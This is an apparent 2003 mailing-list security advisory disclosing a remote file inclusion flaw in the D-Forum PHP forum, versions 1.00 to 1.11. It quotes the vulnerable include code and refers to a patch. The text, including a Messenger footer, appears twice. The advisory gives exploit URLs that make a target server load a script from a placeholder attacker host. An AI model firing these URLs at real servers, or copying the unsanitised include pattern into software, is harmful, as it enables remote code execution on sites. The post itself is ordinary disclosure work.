D-Forum (PHP)Feb 16 2003 05:06PM Frog Man (leseulfrog hotmail com)
Informations :
°°°°°°°°°°°°°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 -> 1.11
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/includes/header.php3 :
---------------------------
<?php
if ($my_header!="")
{
include ($my_header);
} else {
?>
...
--------------------------
/includes/footer.php3 :
---------------------------
...
if ($my_footer!="")
{
include ($my_footer);
} else {
?>
...
---------------------------
Exploits :
°°°°°°°°°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.
txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.
txt
with
http://[attacker]/script.txt
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .
More details :
°°°°°°°°°°°°°°
(in French) http://www.frog-man.org/tutos/5holes8.txt
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
Informations :
°°°°°°°°°°°°°°
Website : http://www.adalis.fr/adalis.html
Versions : 1.00 -> 1.11
Problem : Include file
PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
/includes/header.php3 :
---------------------------
<?php
if ($my_header!="")
{
include ($my_header);
} else {
?>
...
--------------------------
/includes/footer.php3 :
---------------------------
...
if ($my_footer!="")
{
include ($my_footer);
} else {
?>
...
---------------------------
Exploits :
°°°°°°°°°°
http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.
txt
or
http://[target]/includes/header.php3?my_header=http://[attacker]/script.
txt
with
http://[attacker]/script.txt
Patch :
°°°°°°°
A patch can be found on http://www.phpsecure.info .
More details :
°°°°°°°°°°°°°°
(in French) http://www.frog-man.org/tutos/5holes8.txt
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://messenger.fr.msn.be
[ reply ]